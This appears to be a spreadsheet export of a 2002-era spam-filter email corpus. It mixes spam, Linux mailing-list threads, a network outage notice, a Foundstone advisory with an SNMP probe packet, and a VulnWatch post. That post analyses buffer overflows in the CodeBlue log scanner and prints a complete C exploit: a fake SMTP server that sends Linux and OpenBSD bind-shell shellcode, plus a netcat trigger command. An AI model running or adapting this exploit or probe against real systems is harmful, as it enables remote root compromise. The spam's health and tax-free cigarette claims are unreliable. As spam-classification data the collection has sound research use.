 &lt;center&gt;&lt;table width="481"&gt;&lt;tr&gt;
       &lt;td height="96" width="247"&gt;
 &lt;p align="left"&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif" size="3"&gt;Lose Weight&lt;br&gt;Build Muscle Tone&lt;br&gt;Reverse Aging&lt;br&gt;
 Increased Libido&lt;br&gt;
           Duration Of Penile Erection&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
       &lt;/td&gt;
       &lt;td height="96" width="222"&gt;
 &lt;p align="left"&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif" size="3"&gt;Healthier Bones&lt;br&gt;
 Improved Memory&lt;br&gt;Improved skin&lt;br&gt;New Hair Growth&lt;br&gt;Wrinkle Disappearance &lt;/font&gt;&lt;/b&gt;&lt;/p&gt;&lt;/td&gt;&lt;/table&gt;&lt;/center&gt;
 &lt;p align="center"&gt;&lt;a href="http://211.99.37.206:81/ultimatehgh_run/"&gt;&lt;font face="Arial" size="4"&gt;&lt;b&gt;&lt;br&gt;
   Visit Our Web Site and Learn The Facts : Click Here&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
   &lt;br&gt;
   If the above link is not operational, Please &lt;a href="http://211.98.24.90:81/ultimatehgh_run/"&gt;&lt;b&gt;Click 
   Here&lt;/b&gt;&lt;/a&gt; again.&lt;br&gt;
   &lt;br&gt;
   &lt;br&gt;
   You are receiving this email as a subscr&lt;!--zzzz--&gt;iber&lt;br&gt;
   to the Opt&lt;!--zzzz--&gt;-In Ameri&lt;!----&gt;ca Mailin&lt;!----&gt;g Lis&lt;!----&gt;t. &lt;br&gt;
   To remo&lt;!--zzzz--&gt;ve your&lt;!----&gt;self from all related mailli&lt;!--me--&gt;sts,&lt;br&gt;
   just &lt;a href="http://202.96.124.10:81/ultimatehgh_run/remove.php?userid=zzzz@spamassassin.taint.org"&gt;Click 
   Here&lt;/a&gt;&lt;/p&gt;
 &lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Daniel Quinlan &lt;quinlan@pathname.com&gt; wrote:
 &gt; Exactly, except that I think you may be too optimistic
 &gt; about the reporting, the timeframe, and the accuracy.
 That's another argument for a "HLL" (Habeas Licensee List) which would be less
 inclusive than a test for the mark of for HIL, but more timely and accurate. When an
 ip address is on the HLL it could get a huge negative score, bigger than the Habeas
 mark alone.
  -- sidney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</si>
  <si>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John P. Looney wrote:
 &gt; On Tue, Aug 13, 2002 at 09:53:55AM +0100, Damian O' Sullivan mentioned:
 &gt; 
 &gt;&gt;&gt; Curiously, when I go into the boot prom, an use
 &gt;&gt;&gt; "set_params" I can tell it to mount /dev/hda2 as root. But 
 &gt;&gt;&gt;then it uses the PROM copy of the kernel (dodgy 2.2.16 
 &gt;&gt;&gt;kernel), which doesn't know ext3, so wants to fsck up my disk.
 &gt;&gt;
 &gt;&gt;Boot prom on a cobalt? Is this an old mips based one? How did you get to it?
 serial I would guess
 &gt; 
 &gt;  This is actually a raq3. Though, I do have an old raq2 that Liam was
 &gt; helping me get netbsd on (about all you'll get on a 16MB machine these
 &gt; days).
 &gt; 
 &gt;  Anyway, I wussed out, and copied hda1:/ to hda2:/boot and set the bootfs
 &gt; to be hda2. It worked, though it's mounting an ext3fs as ext2. But I'm
 &gt; getting there.
 &gt; 
 http://list.cobalt.com/pipermail/cobalt-developers/2001-February/026056.html
 Pdraig.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On 14:22 29 Aug 2002, Matthias Saou &lt;matthias@egwn.net&gt; wrote:
 | Once upon a time, Axel wrote :
 | &gt; I am now relaxed again ;), and pass this info on. Probably Matthias Saou
 | &gt; himself is "dude", and some package has hardwired a path in his build
 | &gt; directory. It would be nice to find out which and fix it, but I am using
 | &gt; too many of the freshrpm suite to narrow it down.
 | 
 | Indeed, my usual login is "dude" (and has been since long before "The Big
 | Lebowsky" came out ;-)), and it seems the some programs wrongly hard code
 | my home directory when being compiled :-(
 | For instance :
 | 
 | [dude@python dude]$ strings /usr/bin/gentoo | grep dude
 | /home/dude/
 | [dude@python dude]$ strings /usr/bin/xine | grep dude
 | /home/dude/redhat/tmp/xine-root/usr/share/locale
 | 
 | These should probably be considered bugs in the program's build process
 | (especially for xine, look at that!), I'll report them upstream if/when I
 | have some time.
 This is a standard trap for people building things from source. It's
 generally wise to have a special "build" environment to avoid these
 hassles. Most likely you have some library loading path in your env. An
 strace of the app will show it:
 	the-app 2&gt;&amp;1 | grep dude
 Personally, I have a script called logbuild whose entire purpose is to
 start a shell with a minimal build environment, logged with script. The
 prevents this kind of error. Since configure yanks all sorts of ill
 documented values from one's environment for use in the build (CC, ARCH,
 various LD_* variables) this kind of thing is necessary.
 Often the easiest thing is to have a special nonroot account with no .profile
 for building stuff.
 Cheers,
 -- 
 Cameron Simpson, DoD#743        cs@zip.com.au    http://www.zip.com.au/~cs/
 Do not taunt Happy Fun Coder.
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [VulnWatch] Remote hole in Codeblue log scanner
</t>
  </si>
  <si>
    <t xml:space="preserve">TITLE: Potential remote root in CodeBlue log scanner
 NAME: DEMI SEX GOD FROM HELL ADV 00001
 DATE: YES, PLEASE MAIL ME IF YOU ARE FEMALE (send pictures)
 CRAZY TRACKING NUMBER THAT MAKES IT LOOK LIKE I HAVE SOME MASSIVE DATABASE OF
 JUAREZ: 7363A64B02
 Props to dme@#!
 Information
 -----------
 you may remember me from sweaty nights of passion, or perhaps from yesterday when
 i announced the release of a piece of software i wrote (many years ago too
 btw).
 in general i received no feedback from this, cept from one guy having problems
 downloading it (howd that go btw?) and then this:
 From: "Michael"
 To: "'Demi Sex God from Hell'"
 Subject: RE: ass the attack spoofing shell
 Annoying. Pointless.
 well! how very very rude. that really was uncalled for. (propz to dme yo!).
 gay, bi or curious, i went to find out more about mystical michael, who is
 obviously very important as he is the only one who felt the need to tell me
 they didnt like me. it turns out, hes a bit of programmer, with some code
 available on his website (www.tenebrous.com). I got codeblue, (btw mystical
 mike your auto-download script for you counter gives me a 500 error), a log
 checking utility mystical mike wrote and released under the GNU GPL to make
 the world a better place.
 If this tool is run as root (say nightly from roots crontab) there is a
 potential remote root. in any case, regardless of user, there is
 always a remote. if codeblue is locally suid, theres many overflows all
 throughout it, easy peasy like the girls in st patricks!!!.
 Note st patricks is a great place in sydney, playground of the rich and
 famous. visit it if you ever visit sydney, tell them i sent you.
 so lets have a walk through the code, and get a feel for mystical mike, the
 man behind the mystic. (do you wear a crazy robe with a hood like a monk
 mike?)
 $ cd codeblue
 $ ls
 CHANGES     COPYING     Makefile    README      codeblue.c
 $ head COPYING
                     GNU GENERAL PUBLIC LICENSE
                        Version 2, June 1991
  Copyright (C) 1989, 1991 Free Software Foundation, Inc.
      59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
  Everyone is permitted to copy and distribute verbatim copies
  of this license document, but changing it is not allowed.
                             Preamble
 /* uh-oh */
 $ vi codeblue.c
 /*
  * $Header: /usr/src/Projects/codeblue/codeblue.c,v 1.1 2001/08/02 20:40:01
  * root Exp root $
  *
  ******************************************************************************************
  *                      -[ G O D  B L E S S  A M E R I C A ]-
  *
  ******************************************************************************************
  *
  *            CodeBlue v5.0 by Michael (mystic@tenebrous.com)
  *  This software is freely distributable under the terms of the GNU/GPL.
  *                    Please see file 'COPYING'
 /* god bless america, AND mystical mike! */
 ....
 /* line ~273 */
 /*
  * siginal_init:
  * sets up all the signals we'd like
  * to handle specially
  */
 void signal_init(void)
 {
     struct sigaction sa_old, sa_new;
     /* signal handling */
     sa_new.sa_handler = signal_handler;
     sigemptyset(&amp;sa_new.sa_mask);
     sa_new.sa_flags = 0;
     sigaction(SIGINT, &amp;sa_new, &amp;sa_old);
     sigaction(SIGPIPE, &amp;sa_new, &amp;sa_old);
 }
 /* shared signal handler doing all sorts of stuff, not very good mike :( */
 /* line ~289 */
 /*********************************************************************
  * Our close() wrapper
  */
 int Close(int sd)
 {
     return (close(sd));
 }
 /* that just made me laugh */
 /* line ~661 */
 char logline[512]; /* logline is global */
 int scan_file(FILE * fp)
 {
     char buffer[1024];
 ....
         fgets(buffer, 1024, fp);
 ....
         if (found_infected == 1) { /* if it picks up a worm entry in the */
 				   /* log this is true */
             strcpy(logline, buffer);
 	    /* oh dear */
 /* line ~827 */
 char reply[512]; /* global */
 char whoispath[512] = "/usr/bin/whois"; /* global */
 int main(int argc, char **argv)
 {
  	.....
             if (argv[i][0] == '-')
                 switch (argv[i][1]) {
                 case 'e':{      /* return email address */
                         if ((!argv[i + 1]) || (argv[i + 1][0] == '-'))
                             DieWithRequire(argv[i]);
                         strcpy(reply, argv[i + 1]);
                         break;
                     }
                 case 'p':{      /* path to whois binary */
                         if ((!argv[i + 1]) || (argv[i + 1][0] == '-'))
                             DieWithRequire(argv[i]);
                         strcpy(whoispath, argv[i + 1]);
                         break;
                     }
 	/* whoops! */
 Now, all this is good for a laugh, but unless its suid, not much use :(
 CodeBlue will scan apache/squid logfiles looking for code red and nimda log
 hits. If it finds a hit, it will connect to the source ip adress of the hit
 and send an email warning of infection. Unfortunately, mystical mike was too
 far up on his high horse to write something decent.
 The function that does this is send_email() (line ~552)
 It starts off like this:
 int send_email(void)
 {
 	int sd;
 	char *host = malloc(sizeof(char) * 512);
 /*  .... silly crap using popen and stuff .... */
 	/* host is the infected host from the logfiles
  	 * this will connect to the host on port 25
 	 */
     if ((sd = smtp_connect(host)) &lt; SUCCESS)
         return -1;
 /* Step 0 - Get initial server response */
     get_smtp_reply(sd);
 /* this is the function of interest */
 /* line ~345 */
 /*********************************************************************
  * fetches a reply from the SMTP server
  */
 int get_smtp_reply(int sd)
 {
     char response[1024]; /* this is the remote host's mail server buf */
 	....
     /*
      * We'll loop infinately, receiving
      * 1 byte at a time until we receive a carriage return
      * or line-feed character, signifying the end of the output
      */
 	/* GEE! THAT SOUNDS LIKE A GOOD IDEA MYSTICAL MIKE#@!#@! */
 	....
     while (TRUE) {
         if (select((sd + 1), &amp;rset, NULL, NULL, &amp;tv) &lt; 0) {
             if (errno != EINPROGRESS) {
                 fprintf(stderr, "[ ERROR: select() failed: %s\n",
                         strerror(errno));
                 return -1;
             }
         }
         if (recv(sd, (int *) &amp;response[i], 1, RECV_FL) &lt; 0) { /* Hello */
             if (errno == EAGAIN) {
                 if (elapsed &gt;= smtp_timeout) {
                     fprintf(stderr, "[ ERROR: operation timed out\n");
                     fprintf(log, "..... ERROR: operation timed out\n");
                     return -1;
                 }
                 elapsed++;
                 usleep(smtp_timeout * 10000);
                 continue;
             } else {
                 if (!(flags &amp; FL_BEQUIET))
                     fprintf(stderr, "[ ERROR: recv() failed: %s\n",
                             strerror(errno));
                 fprintf(log, "..... ERROR: recv() failed: %s\n",
                         strerror(errno));
                 return -1;
             }
         }
         if ((response[i] == '\n')
             || ((response[i] == '\n') &amp;&amp; (response[i + 1] == '\n')))
             break;
         i++; /* come here often baby? */
     }
 So slowly but surely, response is overrun, unless it its a newline.
 /*
  * hi, this is an exploit that doesnt work. it should be enough of a point in
  * the right direction though. the overflow is in get_smtp_reply(), codeblue.c
  * is pretty damn poor, there are more!!!
  *
  * being in a funny mood one afternoon, i made some software publicly
  * available, the next morning i see this in my mailbox:
  *
  * ------- begin spouting off  ------
  * From mystic@tenebrous.com Mon Jul 22 19:50:46 2002
  * Return-Path:
  * Delivered-To: doe@orbital.wiretapped.net
  * Received: (qmail 2711 invoked from network); 22 Jul 2002 19:50:45 -0000
  * Received: from mail110.mail.bellsouth.net (HELO imf10bis.bellsouth.net)
  * (205.152.58.50)
  *  by orbital.wiretapped.net with SMTP; 22 Jul 2002 19:50:45 -0000
  * Received: from Michaels ([68.16.174.6]) by imf10bis.bellsouth.net
  *         (InterMail vM.5.01.04.19 201-253-122-122-119-20020516) with ESMTP
  *         id &lt;20020722195143.XJOI21884.imf10bis.bellsouth.net@Michaels&gt;
  *         for ; Mon, 22 Jul 2002 15:51:43 -0400
  * From: "Michael"
  * To: "'Demi Sex God from Hell'"
  * Subject: RE: ass the attack spoofing shell
  * Date: Mon, 22 Jul 2002 15:50:13 -0400
  * Message-ID: &lt;000101c231b8$fedc7740$0200a8c0@Michaels&gt;
  * MIME-Version: 1.0
  * Content-Type: text/plain;
  *	charset="us-ascii"
  * Content-Transfer-Encoding: 7bit
  * X-Priority: 3 (Normal)
  * X-MSMail-Priority: Normal
  * X-Mailer: Microsoft Outlook, Build 10.0.2616
  * Importance: Normal
  * X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
  * In-Reply-To:
  * Status: RO
  *
  * Annoying. Pointless.
  *
  * ------- end spouting off -------
  *
  * HOW RUDE!@##@!@#!
  *
  * so i had a visit to www.tenebrous.com, found some software written by this
  * master coder, and here we are now.
  *
  * To use this against a webserver (A) using codeblue.
  *
  * $ printf "GET /scripts/root.exe\r\n\r\n" | nc A 80
  *
  * this will add an entry in the access log.
  *
  * ON THE SAME HOST:
  *
  * # ./mystic_anus 25
  *
  * wait a while.
  *
  * when codeblue runs it will pull your ip from the logs, connect to your port
  * 25 and try to send you a mail. because mystic is an idiot, you will get a
  * shell with the openbsd code!!!
  *
  * i like exclamation marks !!!!
  *
  * krad haxxor props: dedmunk (happy now#@!!#@) ph1ll1p, caddis, buo, solace,
  * everyone on #cw , everyone in paris (you have a lovely city, i had a lovely
  * time last weekend, thankyou!!!) dedmunk, everyone at netcraft (esp Mike,
  * hi!), everyone in sydney, dedmunk, everyone i go drinking with, anyone who
  * lives in london, marlinspike (yo!), the woman who sells me my cigarettes in
  * the morning on the way into work, thomas greene, dedmunk, adam, durab, sh00ter.
  *
  * BIG SHOUT OUT TO TOLIMAN AND ZERO SUM, UNDERSTAND!!
  *
  * propz to dme#!@#!@
  *
  * dont forget:
  *
  * $Header: /usr/src/Projects/codeblue/codeblue.c,v 1.1 2001/08/02 20:40:01 root Exp root $
  *
  ******************************************************************************************
  *                      -[ G O D  B L E S S  A M E R I C A ]-                             *
  ******************************************************************************************
  *
  */
 #include &lt;stdio.h&gt;
 #include &lt;string.h&gt;
 #include &lt;unistd.h&gt;
 #include &lt;fcntl.h&gt;
 #include &lt;stdlib.h&gt;
 #include &lt;sys/types.h&gt;
 #include &lt;sys/socket.h&gt;
 #include &lt;netinet/in.h&gt;
 #include &lt;arpa/inet.h&gt;
 #define OF 2048 /* this is bigger than needed */
 /* Optimized the code, now it works better in bad situations */
 /* i dont know who wrote this, sorry, if you wrote it, let me know */
 char lunix_shellcode[]=
 "\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
 "\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
 "\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"
 "\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
 "\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
 "\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
 "\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
 "\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";
 /*
  shell on port 6969/tcp shellcode for OpenBSD by noir
 */
 long bsd_shellcode[]=
 {
   0x4151c931,0x51514151,0x61b0c031,0x078980cd,
   0x4f88c931,0x0547c604,0x084f8902,0x0647c766,
   0x106a391b,0x5004478d,0x5050078b,0x68b0c031,
   0x016a80cd,0x5050078b,0x6ab0c031,0xc93180cd,
   0x078b5151,0xc0315050,0x80cd1eb0,0xc9310789,
   0x50078b51,0xb0c03150,0x4180cd5a,0x7503f983,
   0x5b23ebef,0xc9311f89,0x89074b88,0x8d51044f,
   0x078b5007,0xc0315050,0x80cd3bb0,0x5151c931,
   0x01b0c031,0xd8e880cd,0x2fffffff,0x2f6e6962,
   0x90416873
 };
 int main(int argc, char *argv[])
 {
 	struct 	sockaddr_in sock_in;
 	struct 	sockaddr_in sock_out;
 	char 	*port = "25";
 	int 	fd, a;
 	int 	len;
 	int		opt;
 	char bigbuf[OF];
 	char *p;
 	long lunix_resp = 0xbfffe0ac;
 	long bsd_resp = 0xdfbfc068;
 	char *moo = "220 ";
 	long resp = lunix_resp;
 	char *shellcode = lunix_shellcode;
 	printf("strlen scode = %d\n", strlen(shellcode));
 	if (argc == 2)
 		port = argv[1];
 	if (argc &gt; 2) {
 		fprintf(stderr, "usege: %s [port]\n", argv[0]);
 		exit(1);
 	}
 	resp += 8;
 	p = bigbuf;
 	memcpy(p, moo, 4);
 	p += 4;
 	memset(p, '\x90', 1020 - strlen(shellcode));
 	p += 1020 - strlen(shellcode);
 	memcpy(p, shellcode, strlen(shellcode));
 	p += strlen(shellcode);
 	memcpy(p, &amp;resp, 4);
 	p += 4;
 	memcpy(p, &amp;resp, 4);
 	p += 4;
 	memset(p, '\n', 4);
 	if ((fd = socket(PF_INET, SOCK_STREAM, 0)) &lt; 0){
 		perror("socket");
 		exit(1);
 	}
 	memset(&amp;sock_in, 0, sizeof(sock_in));
 	sock_in.sin_family = AF_INET;
 	sock_in.sin_port = htons(atoi(port));
 	sock_in.sin_addr.s_addr = INADDR_ANY;
 	len = sizeof(sock_in);
 	opt = 1;
 	if (setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, &amp;opt, sizeof(int)) == -1) {
 			perror("setsockopt");
 			exit(1);
 	}
 	if (bind(fd, (struct sockaddr *)&amp;sock_in, len) &lt; 0) {
 		perror("bind");
 		exit(1);
 	}
 	if (listen(fd, 5) &lt; 0) {
 		perror("listen");
 		exit(1);
 	}
 	printf("listening on port %d\n", atoi(port));
 	for (;;) {
 		len = sizeof(sock_out);
 		if ((a = accept(fd, (struct sockaddr *)&amp;sock_out, &amp;len)) &lt; 0){
 			perror("accept");
 			exit(1);
 		}
 		printf("got a connection from %s\n", inet_ntoa(sock_out.sin_addr));
 		fflush(stdout);
 		write(a, bigbuf, sizeof(bigbuf));
 		close(a);
 	}
 	return(1);
 }
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Jesse wrote :
 &gt; Have you thought of bumping up sylpheed-claws?  I see sylpheed got a
 &gt; bump... show some claws love?  (;
 Well, in sylheed's "claws" branch you need to wait a bit for the developers
 to backport all the updates from the main branch before getting a release
 with the same version number.
 Right now, the latest "claws" release is still 0.8.2claws :
 http://sourceforge.net/project/showfiles.php?group_id=25528
 But as it's the primary mailer I use, you can be sure that as soon as it's
 updated to 0.8.3, I'll update my build! :-)
 Matthias
 -- 
 Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
 Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10
 Load : 0.18 0.23 0.33, AC on-line, battery charging: 100% (4:47)
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: fortune 500 company hiring, work from home
</t>
  </si>
  <si>
    <t xml:space="preserve">WE NEED HELP.  We are a 14 year old fortune 500 company, and we have 
 grown 1000%!  We cannot keep up.  We are looking for individuals who 
 want to work at home, and make a good living.
 So if you are looking to be employed from home with a career that has
 vast opportunities, then go:
 http://www.lotsonet.com/opportunity
 and fill out our info form.  NO EXPERIENCE REQUIRED, WE WILL TRAIN YOU.
 NO COMMITTMENT IS REQUIRED BY FILLING OUT THE FORM, IT IS FOR INFO
 ONLY.
 http://www.lotsonet.com/opportunity
 You want to be independent?  THEN MAKE IT HAPPEN!
 HAPPEN!
 SIMPLY CLICK ON THE LINK BELOW FOR FREE, NO OBLIGATED INFORMATION!
 GUARANTEED!
 http://www.lotsonet.com/opportunity
 To be removed from our link simple go to:
 http://www.lotsonet.com/opportunity/remove.html
 4227KypC4-306RFEI2068IzYK2-443dlUl6l33
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: CIGARETTES WHOLESALE!       HYWWZZLZD
</t>
  </si>
  <si>
    <t xml:space="preserve">$19.95 and up!  Buy cartons of cigarettes wholesale, starting at $19.95.  
 FREE SHIPPING!
 Why pay state taxes?  100% legal. Mailed from Swiss bonded warehouse. For 
 personal use only, must be 18 years of age and older, verified by credit 
 card. 
 http://4tools4life.com/cigs/index.php?104
 AOL Users &lt;a href="http://4tools4life.com/cigs/index.php?104"&gt;Click Here&lt;/a&gt;
 To be removed from future mailings, REPLY to this email with REMOVE in the SUBJECT line.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [VulnWatch] Foundstone Labs Advisory - Information Leakage in Orinoco and Compaq Access Points
</t>
  </si>
  <si>
    <t xml:space="preserve">Foundstone Labs Advisory - 080902-APIL
 Advisory Name:	Information Leakage in Orinoco and Compaq Access Points
  Release Date:	August 9th, 2002
   Application:	Orinoco Residential Gateway and Compaq WL310
     Platforms:	N/A
      Severity:	The ability to display/modify configuration information
       Vendors:	Orinoco (http://www.orinocowireless.com) and
                   Compaq (http://www.compaq.com)
       Authors:	Marshall Beddoe (marshall.beddoe@foundstone.com)
                   Tony Bettini (tony.bettini@foundstone.com)
 CVE Candidate:	CAN-2002-0812
     Reference:	http://www.foundstone.com/advisories
 Overview:
 An information leakage vulnerability exists in Orinoco and Compaq OEM 
 access points, disclosing the unique SNMP community string. As a result,
 an attacker can query the community string and gain the ability to
 change
 system configuration including Wired Equivalent Privacy (WEP) keys and 
 Domain Name Service (DNS) information.
 Detailed Description:
 The Compaq WL310 is an OEM Orinoco Residential Gateway access point.
 Both the Compaq and Orinoco access points use a unique identification
 number
 found on the bottom of the access point for configuration through
 their management client. This identification string is used as the
 default SNMP read/write community string. The community strings appears
 to be unchangable, unique, and not easily guessable. By sending a
 specific packet to UDP port 192, the access point will return
 information including the firmware version and the unique identification
 value. The packet returned includes the value of system.sysName.0, which
 in the case of the Compaq WL310 and Orinoco Residential Gateway,
 includes
 the unique identification value. The identification value can then be
 used as the SNMP community string to view and modify the configuration.
 The probe packet:
 "\x01\x00\x00\x00\x70\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
 "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
 "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
 "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
 "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
 "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
 "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
 "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
 Example probe response:
 01 01 00 00 00 00 00 00  00 00 00 00 00 00 00 00  | ................
 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  | ................
 00 00 00 00 00 60 1d 20  2e 38 00 00 18 19 10 f8  | .....`. .8......
 4f 52 69 4e 4f 43 4f 20  52 47 2d 31 31 30 30 20  | ORiNOCO RG-1100
 30 33 39 32 61 30 00 00  00 00 00 00 00 00 00 00  | 0392a0..........
 02 8f 24 02 52 47 2d 31  31 30 30 20 56 33 2e 38  | ..$.RG-1100 V3.8
 33 20 53 4e 2d 30 32 55  54 30 38 32 33 32 33 34  | 3 SN-02UT0823234
 32 20 56 00                                       | 2 V.
 system.sysName.0 = "ORiNOCO RG-1100 0392a0"
 Community name: 0392a0
 Vendor Response:
 Both vendors were notified of this issue on July 8th, 2002. According
 to Orinoco, "The Residential Gateway line has been discontinued."
 Solution:
 Employ packet filtering on inbound requests to deny access to ports
 192/udp and 161/udp on the access point.
 FoundScan has been updated to check for this vulnerability. For more
 information on FoundScan, see the Foundstone website:
 http://www.foundstone.com
 Disclaimer:
 The information contained in this advisory is copyright (c) 2002 
 Foundstone, Inc. and is believed to be accurate at the time of 
 publishing, but no representation of any warranty is given, 
 express, or implied as to its accuracy or completeness. In no 
 event shall the author or Foundstone be liable for any direct, 
 indirect, incidental, special, exemplary or consequential 
 damages resulting from the use or misuse of this information.  
 This advisory may be redistributed, provided that no fee is 
 assigned and that the advisory is not modified in any way.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Let us find the right mortgage lender for you      AFPE
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] FW: [EVENT NOTIFICATION] UUnet North American
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --5vNYLRcllDrimb99
 Content-Type: text/plain; charset=us-ascii
 Content-Disposition: inline
 Content-Transfer-Encoding: quoted-printable
 For everyone's benefit/edification, regardless of Razor usage.
 --jordan
 -----Original Message-----
 From: InterNAP Backbone Status Reports [mailto:noc@internap.com]
 Sent: Thursday, October 03, 2002 11:30 AM
 To: InterNAP Backbone Status Reports
 Subject: [EVENT NOTIFICATION] UUnet North American Backbone Problems
 20021003@06:00 PDT [TIX106448] (fwd)
 Hello,
 I have just spoken with an UUnet technician at 11:23 PDT and he was unable
 to provide me with any new information regarding the outage.  He did
 confirm that problems had spread beyond the east coast and are now seen
 nationwide through out their network.  They are currently working with
 their hardware vendor to try and isolate the issue.
 A large number of Internap's connections to UUnet remain shutdown and
 traffic is being routed over alternate providers.  The scale of this
 outage is causing a large number of peering points with UUnet and other
 providers to be flooded due to the large traffic shifts.
 If you have problems reaching specific sites please send an email to
 noc@internap.com containing a traceroute and source/destination IP
 addresses and we will investigate.  If it is possible will will attempt to
 move specific prefixes onto an alternate provider leaving an Internap PNAP
 if that will provide better performance.
 Regards,
 Andrew
 --------------------------------------------------------------------
 Andrew Dul                                 Network Operations Center
 InterNAP Network Services                   E-Mail: noc@internap.com
 andrew@internap.com                    206.256.9500 - 1.877.THE.INOC
 The contents of this email message are confidential and proprietary.
 ---------- Forwarded message ----------
 Date: Thu, 3 Oct 2002 08:51:26 -0700 (PDT)
 From: Andrew Dul &lt;andrew@internap.com&gt;
 Subject: [EVENT NOTIFICATION] UUnet North American Backbone Problems
     [TIX106448]
 UUnet is currently experiencing a large number of problems in their North
 American backbone.  Internap has been aware of these problems since approx
 06:00 PST.  Most of the problems appear to be concentrated on the East
 Coast but we have reports of problems from other geographic regions.
 This is being tracked under Internap ticket 106448 and UUnet master ticket
 651751.
 UUnet currently does not have any ETA for a fix for this event.
 If you have issues reaching a specific site please send an email to
 noc@internap.com with a traceroute showing the path which has a problem.
 Internap has shutdown peerings to UUnet is various cities to help reduce
 the number of problems that customers will experience.
 Regards,
 Andrew
 --------------------------------------------------------------------
 Andrew Dul                                 Network Operations Center
 InterNAP Network Services                   E-Mail: noc@internap.com
 andrew@internap.com                    206.256.9500 - 1.877.THE.INOC
 The contents of this email message are confidential and proprietary.
 --5vNYLRcllDrimb99
 Content-Type: application/pgp-signature
 Content-Disposition: inline
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.2.0 (GNU/Linux)
 iD8DBQE9nI+8pwQdAVEbU7oRAp25AJ9wlEUgdqUFi+7Hy/yYowIAid480gCfX49d
 M4Ox3gKrlqqmZ+hAy0wTFl0=
 =e6sV
 -----END PGP SIGNATURE-----
 --5vNYLRcllDrimb99--
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: I have visited IIU.TAINT.ORG and noticed that ...
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;&lt;/title&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;
 &lt;style type="text/css"&gt;
 .stbtm {
 	BACKGROUND-COLOR:#cecbde; BORDER-BOTTOM: #665b8e 1px solid; BORDER-LEFT: #ffffff 1px solid; BORDER-RIGHT: #665b8e 1px solid; BORDER-TOP: #ffffff 1px solid; COLOR: #000000; FONT-SIZE: 12pt; HEIGHT: 26px; WIDTH: 120px; clip:        rect(   )}
 .stedit {
 	 background-color:#484C68; white-space: nowrap; border: #000000; BORDER-BOTTOM: #ffffff 1px solid; BORDER-LEFT: #ffffff 1px solid; BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #ffffff 1px solid; FONT-SIZE: 10pt; color: #CCCCCC; font-weight: bold}
 &lt;/style&gt;
 &lt;/head&gt;
 &lt;BODY leftMargin=0 onload="" topMargin=0 marginheight="0" marginwidth="0" bgcolor="#FFFFFF"&gt;
 &lt;table width="778" border="0" cellspacing="0" cellpadding="0"&gt;
   &lt;tr&gt;
     &lt;td height="233" width="21"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td height="233" colspan="3" width="757"&gt; 
       &lt;table width="621" border="0" cellspacing="0" cellpadding="0" align="left"&gt;
         &lt;tr&gt; 
           &lt;td width="373" height="64"&gt; 
             &lt;table width="373" border="0" cellspacing="0" cellpadding="0" background="http://image.seekercenter.net/letter_bg.jpg" height="327"&gt;
                 &lt;tr&gt; 
                 &lt;td&gt;&lt;p&gt; 
                   &lt;font face=Arial size=2&gt;
